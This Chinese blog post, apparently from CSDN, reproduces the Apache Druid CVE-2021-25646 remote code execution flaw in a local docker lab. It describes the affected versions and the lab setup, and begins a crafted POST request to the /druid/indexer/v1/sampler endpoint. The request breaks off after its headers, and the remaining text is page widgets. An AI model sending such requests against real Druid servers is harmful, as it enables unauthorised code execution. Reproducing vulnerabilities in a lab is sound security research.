Apache Druid (CVE-2021-25646)远程代码执行漏洞复现

本文详细介绍了Apache Druid的CVE-2021-25646远程代码执行漏洞,该漏洞由于默认缺乏授权认证,允许攻击者通过特制请求执行任意代码。影响范围为Apache Druid 0.20.0及更低版本。文中提供了解决环境的步骤,并分享了两种漏洞复现方法:直接构造数据包和通过抓包修改数据。通过这两种方式,可以验证漏洞的有效性并实现命令执行。
摘要由CSDN通过智能技术生成

漏洞概述

Apache Druid 是用Java编写的面向列的开源分布式数据存储,旨在快速获取大量事件数据,并在数据之上提供低延迟查询。 Apache Druid 默认情况下缺乏授权认证,攻击者可以发送特制请求,利用Druid服务器上进程的特权执行任意代码。 Apache Druid包括执行用户提供的JavaScript的功能嵌入在各种类型请求中的代码。此功能在用于高信任度环境中,默认已被禁用。但是,在Druid 0.20.0及更低版本中,经过身份验证的用户发送恶意请求,利用Apache Druid漏洞可以执行任意代码

影响版本

Apache Druid < 0.20.1

环境搭建

vulhub提供了搭建环境,但是我这里搭建的时候很卡(甚至崩了),所以换个方式。

下载环境:
https://github.com/apache/druid/archive/druid-0.20.0.zip

进入distribution\docker路径下:

开启环境:docker-compose up -d

访问http://IP地址:8888,有如下页面则搭建成功:

在这里插入图片描述

漏洞复现

有两种方式:

1.直接构造数据包:

POST /druid/indexer/v1/sampler HTTP/1.1
Host: xxx.xxx.xxx.xxx:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值